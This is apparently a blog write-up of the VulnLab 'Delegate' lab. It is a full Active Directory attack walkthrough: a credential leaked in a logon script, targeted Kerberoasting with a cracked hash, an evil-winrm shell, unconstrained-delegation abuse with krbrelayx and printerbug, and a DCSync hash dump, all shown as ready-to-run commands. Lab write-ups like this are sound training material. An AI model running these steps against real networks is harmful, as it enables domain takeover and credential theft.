VulnLab Delegate
VulnLab Delegate
VulnLab Delegate
Delegate
Recon
1
2
└─$ rustscan -g -a 10.10.79.151 -r 1-65535
10.10.79.151 -> [53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389 10.10.79.151
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 19:24 +05
Nmap scan report for 10.10.79.151
Host is up (0.51s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-24 14:23:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Not valid before: 2024-12-23T14:19:13
|_Not valid after: 2025-06-24T14:19:13
| rdp-ntlm-info:
| Target_Name: DELEGATE
| NetBIOS_Domain_Name: DELEGATE
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: delegate.vl
| DNS_Computer_Name: DC1.delegate.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-12-24T14:23:18+00:00
|_ssl-date: 2024-12-24T14:23:58+00:00; -1m19s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-12-24T14:23:19
|_ start_date: N/A
|_clock-skew: mean: -1m19s, deviation: 0s, median: -1m19s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.02 seconds
User
Anonymous authentication on SMB shows nothing interesting. Let’s run spider module
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
└─$ nxc smb 10.10.79.151 -u guest -p '' -M spider_plus
SMB 10.10.79.151 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.79.151 445 DC1 [+] delegate.vl\guest:
SPIDER_PLUS 10.10.79.151 445 DC1 [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.79.151 445 DC1 [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.79.151 445 DC1 [*] STATS_FLAG: True
SPIDER_PLUS 10.10.79.151 445 DC1 [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.79.151 445 DC1 [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.79.151 445 DC1 [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.79.151 445 DC1 [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.79.151 445 DC1 [*] Enumerated shares
SMB 10.10.79.151 445 DC1 Share Permissions Remark
SMB 10.10.79.151 445 DC1 ----- ----------- ------
SMB 10.10.79.151 445 DC1 ADMIN$ Remote Admin
SMB 10.10.79.151 445 DC1 C$ Default share
SMB 10.10.79.151 445 DC1 IPC$ READ Remote IPC
SMB 10.10.79.151 445 DC1 NETLOGON READ Logon server share
SMB 10.10.79.151 445 DC1 SYSVOL READ Logon server share
SPIDER_PLUS 10.10.79.151 445 DC1 [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.79.151.json".
SPIDER_PLUS 10.10.79.151 445 DC1 [*] SMB Shares: 5 (ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.79.151 445 DC1 [*] SMB Readable Shares: 3 (IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.79.151 445 DC1 [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.79.151 445 DC1 [*] Total folders found: 19
SPIDER_PLUS 10.10.79.151 445 DC1 [*] Total files found: 7
SPIDER_PLUS 10.10.79.151 445 DC1 [*] File size average: 1.15 KB
SPIDER_PLUS 10.10.79.151 445 DC1 [*] File size min: 22 B
SPIDER_PLUS 10.10.79.151 445 DC1 [*] File size max: 3.86 KB
There’s users.bat script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
{
"NETLOGON": {
"users.bat": {
"atime_epoch": "2023-08-26 18:54:29",
"ctime_epoch": "2023-08-26 18:45:24",
"mtime_epoch": "2023-10-01 15:08:32",
"size": "159 B"
}
},
"SYSVOL": {
"delegate.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
"atime_epoch": "2023-09-09 20:10:32",
"ctime_epoch": "2023-08-26 15:39:30",
"mtime_epoch": "2023-10-01 15:08:32",
"size": "22 B"
},
"delegate.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2023-08-26 17:24:26",
"ctime_epoch": "2023-08-26 15:39:30",
"mtime_epoch": "2023-10-01 15:08:32",
"size": "1.07 KB"
},
"delegate.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2023-08-26 16:01:56",
"ctime_epoch": "2023-08-26 16:01:56",
"mtime_epoch": "2023-10-01 15:08:32",
"size": "2.73 KB"
},
"delegate.vl/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
"atime_epoch": "2023-09-09 20:10:32",
"ctime_epoch": "2023-08-26 15:39:30",
"mtime_epoch": "2023-10-01 15:08:32",
"size": "22 B"
},
"delegate.vl/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2023-09-09 17:17:20",
"ctime_epoch": "2023-08-26 15:39:30",
"mtime_epoch": "2023-10-01 15:08:32",
"size": "3.86 KB"
},
"delegate.vl/scripts/users.bat": {
"atime_epoch": "2023-08-26 18:54:29",
"ctime_epoch": "2023-08-26 18:45:24",
"mtime_epoch": "2023-10-01 15:08:32",
"size": "159 B"
}
}
}
Let’s check content
1
2
3
4
5
└─$ nxc smb 10.10.79.151 -u guest -p '' --share SYSVOL --get-file delegate.vl\\scripts\\users.bat users.bat
SMB 10.10.79.151 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.79.151 445 DC1 [+] delegate.vl\guest:
SMB 10.10.79.151 445 DC1 [*] Copying "delegate.vl\scripts\users.bat" to "users.bat"
SMB 10.10.79.151 445 DC1 [+] File "delegate.vl\scripts\users.bat" was downloaded to "users.bat"
1
2
3
4
5
6
└─$ cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator <REDACTED>
The creds are valid
1
2
3
4
5
6
7
8
9
10
11
└─$ nxc smb 10.10.79.151 -u A.Briggs -p '<REDACTED>' --shares
SMB 10.10.79.151 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.79.151 445 DC1 [+] delegate.vl\A.Briggs:<REDACTED>
SMB 10.10.79.151 445 DC1 [*] Enumerated shares
SMB 10.10.79.151 445 DC1 Share Permissions Remark
SMB 10.10.79.151 445 DC1 ----- ----------- ------
SMB 10.10.79.151 445 DC1 ADMIN$ Remote Admin
SMB 10.10.79.151 445 DC1 C$ Default share
SMB 10.10.79.151 445 DC1 IPC$ READ Remote IPC
SMB 10.10.79.151 445 DC1 NETLOGON READ Logon server share
SMB 10.10.79.151 445 DC1 SYSVOL READ Logon server share
Let’s enumerate domain. We see that A.Briggs has GenericWrite over N.Thompson, who is a mebmer of Remote Management Group
We can perform targeted Kerberoasting using targetedKerberoast.py and crack the hash
1
2
3
4
5
└─$ python3 ~/tools/red-team/targetedKerberoast/targetedKerberoast.py -d 'delegate.vl' -u 'A.Briggs' -p '<REDACTED>' --request-user "N.Thompson" --dc-ip 10.10.79.151
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$664fa24f1ada593976ff6183143991bf$136e3eb290886345007d21b20a1ae115d36a7da19e23c486d617ddd2451363e42549f0acad0fcd98c74cc757ba1cb6901da828c58ee2c2a6cf3d8e638e1becb20b42f7109824e1ef60a976e7d4744d178af69cccbba01863d81fe3e1b3509393df47dd9e824d1956980ad1318308f76921e9f5074741d2f063d98b69beea57ab6d176a9d6004aa48dd95b5fbf13e15638b0803b9c4be9795fc0c5dd110c733bc977f2839ff0df5277e3ccf72b7e20f0de6894c6dfb807df2eb0f98b22b10c7d5edee5db2d7581af160ee865b35b68bc7b1bcbfe75119bd2ac8ac95d2a8aae9254ac384bc9e70a3ceaaa3132b65d32d0be1a4bc8ed47ccbdda136d93ce4f2b0191204751ce2dfd0ac7016ae0e438af116bbe967d19212ecda73d383934c188659f3ceefd4d535376f8d4ca1cc57a767d2f4f527ac3c15b8c771bacae5e78a23de870d55527db334744273912c98d7d064e2ac882cbff318ba99130616691af53d76ff3f05499219a79bb87267b1365a489b5978555f24e7e40b77258fcaa8a509e9d5691714d024203cc3456d8940d0d3a4cf220823e91354f7e4874f8499a3ea1acdd0310f02132b0205c70127e281d3b4238da2916f069b52adf2cb483263f6b3e039f2ca367a5002d1d920a38247a5daae4db14ef2903529ecaf81c93017e76c35b288fdd75678f203d6256d606e226925a6e4c12c79ae86851e73956b373cdec7de9a90cd4d1f1f107de5e4e2b48e264fca7ef0c2652f392b3712efc8518ea979bfb20c3fc4d9e9e8fe2293f57c2d80caae9a63bcb93dc4b142a610859eb4d7b3e3d1fa5dcf383fba023386b539acb346f9247265cdc36975a01b69c14b641dc8cd617b592ae6b2e4efb7fdb2977a14521c0ec6072ca67b5c5f910054f10f798e9a19f07464a6246454eb20b0a1c82ebfcd5c42cd68e9e335f11c2bdd23d5748e32c9113d8203f5e4deeaa973bbc65c7a3b2a8e8b5315d205ff1ab269ad34c26eec691dcfe1989a6e62f28b12ba96ae93a0f8d2ceb9f63d151269ff0017b7553464c749e08729016dd0c1dc68b686117438ac65b203468589e652b17f37fcd67b35e6bdc71f8813cdca7d59c38191f04c263c0550b5a2ceabb453f72beb8c0253b9b2ecd86763ff505ca1bb8c3da5609d843aacc80679d7357961107f0f6136f1c9ec2c994eaf2c488d93a805a8653f2df641acdbda5835b56987516c7f7f01f73b80182a5d93821b70dc7e21638a3f286bb346054e5dc642a99f1ff356b91d860f7bb9b1e8fa7f37c98b29ddf2501384dbacaff12088a6dd8125dda7caee3416d7eac5a267ee765f3074cb87de3cedcb9618e8d3c2baca392b6d2aada436c1a5b6974110ec88f816a779f7c493340d64c4066013478681cd5f74f9b273cd80df8e0d8b235517dd0b16cc802f534e5e1bd6c84159ade0f3b12ca381d080fc12189cac
1
2
3
4
5
└─$ hashcat -m 13100 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$664fa24f1ada593976ff6183143991bf$136e3eb290886345007d21b20a1ae115d36a7da19e23c486d617ddd2451363e42549f0acad0fcd98c74cc757ba1cb6901da828c58ee2c2a6cf3d8e638e1becb20b42f7109824e1ef60a976e7d4744d178af69cccbba01863d81fe3e1b3509393df47dd9e824d1956980ad1318308f76921e9f5074741d2f063d98b69beea57ab6d176a9d6004aa48dd95b5fbf13e15638b0803b9c4be9795fc0c5dd110c733bc977f2839ff0df5277e3ccf72b7e20f0de6894c6dfb807df2eb0f98b22b10c7d5edee5db2d7581af160ee865b35b68bc7b1bcbfe75119bd2ac8ac95d2a8aae9254ac384bc9e70a3ceaaa3132b65d32d0be1a4bc8ed47ccbdda136d93ce4f2b0191204751ce2dfd0ac7016ae0e438af116bbe967d19212ecda73d383934c188659f3ceefd4d535376f8d4ca1cc57a767d2f4f527ac3c15b8c771bacae5e78a23de870d55527db334744273912c98d7d064e2ac882cbff318ba99130616691af53d76ff3f05499219a79bb87267b1365a489b5978555f24e7e40b77258fcaa8a509e9d5691714d024203cc3456d8940d0d3a4cf220823e91354f7e4874f8499a3ea1acdd0310f02132b0205c70127e281d3b4238da2916f069b52adf2cb483263f6b3e039f2ca367a5002d1d920a38247a5daae4db14ef2903529ecaf81c93017e76c35b288fdd75678f203d6256d606e226925a6e4c12c79ae86851e73956b373cdec7de9a90cd4d1f1f107de5e4e2b48e264fca7ef0c2652f392b3712efc8518ea979bfb20c3fc4d9e9e8fe2293f57c2d80caae9a63bcb93dc4b142a610859eb4d7b3e3d1fa5dcf383fba023386b539acb346f9247265cdc36975a01b69c14b641dc8cd617b592ae6b2e4efb7fdb2977a14521c0ec6072ca67b5c5f910054f10f798e9a19f07464a6246454eb20b0a1c82ebfcd5c42cd68e9e335f11c2bdd23d5748e32c9113d8203f5e4deeaa973bbc65c7a3b2a8e8b5315d205ff1ab269ad34c26eec691dcfe1989a6e62f28b12ba96ae93a0f8d2ceb9f63d151269ff0017b7553464c749e08729016dd0c1dc68b686117438ac65b203468589e652b17f37fcd67b35e6bdc71f8813cdca7d59c38191f04c263c0550b5a2ceabb453f72beb8c0253b9b2ecd86763ff505ca1bb8c3da5609d843aacc80679d7357961107f0f6136f1c9ec2c994eaf2c488d93a805a8653f2df641acdbda5835b56987516c7f7f01f73b80182a5d93821b70dc7e21638a3f286bb346054e5dc642a99f1ff356b91d860f7bb9b1e8fa7f37c98b29ddf2501384dbacaff12088a6dd8125dda7caee3416d7eac5a267ee765f3074cb87de3cedcb9618e8d3c2baca392b6d2aada436c1a5b6974110ec88f816a779f7c493340d64c4066013478681cd5f74f9b273cd80df8e0d8b235517dd0b16cc802f534e5e1bd6c84159ade0f3b12ca381d080fc12189cac:<REDACTED>
<SNIP>
Now we can connect via winrm
1
2
3
4
5
6
7
8
9
10
└─$ evil-winrm -u 'N.Thompson' -p '<REDACTED>' -i 10.10.79.151
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>
Root
We can see that N.Thompson is a member of Delegation Admins
The privileges also show that
1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
It means that we can enable Unconstrained delegations or Constrained delegations on a computer. To abuse this privilege, we need to create a computer and we can do that due to Machine Account Quota
1
2
3
4
5
└─$ nxc ldap 10.10.79.151 -u 'N.Thompson' -p '<REDACTED>' -M maq
LDAP 10.10.79.151 389 DC1 [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl)
LDAP 10.10.79.151 389 DC1 [+] delegate.vl\N.Thompson:<REDACTED>
MAQ 10.10.79.151 389 DC1 [*] Getting the MachineAccountQuota
MAQ 10.10.79.151 389 DC1 MachineAccountQuota: 10
Let’s create computer first
1
2
3
4
5
└─$ addcomputer.py -computer-name 'PWN' -computer-pass 'ComputerPass123' -dc-ip 10.10.79.151 'delegate.vl/N.Thompson':'<REDACTED>'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account PWN$ with password ComputerPass123.
Now, we add DNS record for the machine we created using krbrelayx toolkit
1
2
3
4
5
6
└─$ python3 ~/tools/red-team/krbrelayx/dnstool.py -u 'delegate.vl\PWN$' -p 'ComputerPass123' -r 'PWN.delegate.vl' -d 10.8.4.147 --action add 10.10.79.151
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
1
2
3
4
5
6
└─$ nslookup PWN.delegate.vl dc1.delegate.vl
Server: dc1.delegate.vl
Address: 10.10.79.151#53
Name: PWN.delegate.vl
Address: 10.8.4.147
Then we assign TRUSTED_FOR_DELEGATION to created machine, which can be done using bloodyAD or Powerview (Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384)
1
2
└─$ python3 ~/tools/red-team/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p '<REDACTED>' --host 'DC1.delegate.vl' add uac 'PWN$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to PWN$'s userAccountControl
1
2
3
4
└─$ python3 ~/tools/red-team/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p '<REDACTED>' --host 'DC1.delegate.vl' get object 'PWN$' --attr userAccountControl
distinguishedName: CN=PWN,CN=Computers,DC=delegate,DC=vl
userAccountControl: WORKSTATION_TRUST_ACCOUNT; TRUSTED_FOR_DELEGATION
Then we add SPN. If encounter the following error: To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute, run firstly with --additional flag, then run again without it (Usually happens when adding using another user)
1
2
3
4
5
6
└─$ python3 ~/tools/red-team/krbrelayx/addspn.py -u 'delegate.vl\PWN$' -p 'ComputerPass123' -s 'CIFS/PWN.delegate.vl' dc1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
1
2
3
4
5
6
7
8
9
└─$ python3 ~/tools/red-team/krbrelayx/addspn.py -u 'delegate.vl\PWN$' -p 'ComputerPass123' -s 'HOST/PWN.delegate.vl' dc1.delegate.vl -q
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=PWN,CN=Computers,DC=delegate,DC=vl - STATUS: Read - READ TIME: 2024-12-24T21:40:21.224333
msDS-AdditionalDnsHostName: PWN.delegate.vl
sAMAccountName: PWN$
servicePrincipalName: CIFS/PWN.delegate.vl
After finishing preparation, we can start the attack. Convert machine’s password to NTLM hash
1
2
3
└─$ pypykatz crypto nt 'ComputerPass123'
fa0c39088858443e31cf449a9da745ba
Or
1
2
3
└─$ iconv -f ASCII -t UTF-16LE <(printf "ComputerPass123") | openssl dgst -md4
MD4(stdin)= fa0c39088858443e31cf449a9da745ba
Start krbrelayx.py (Had to specify target or it didn’t work)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ sudo python3 krbrelayx.py -hashes :fa0c39088858443e31cf449a9da745ba --target dc1.delegate.vl
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in attack mode to single host
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
And use printerbug to coerce
1
2
3
4
5
6
7
8
└─$ python3 printerbug.py delegate.vl/'PWN$':'ComputerPass123'@dc1.delegate.vl PWN.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
We see the connection and ticket is saved
Now we can dump the hashes
1
2
3
4
5
6
7
8
└─$ KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache secretsdump.py -k -no-pass dc1.delegate.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
https://api.vulnlab.com/api/v1/share?id=5727db2c-27ce-40a1-9fa1-abd3445f89de
This post is licensed under CC BY 4.0 by the author.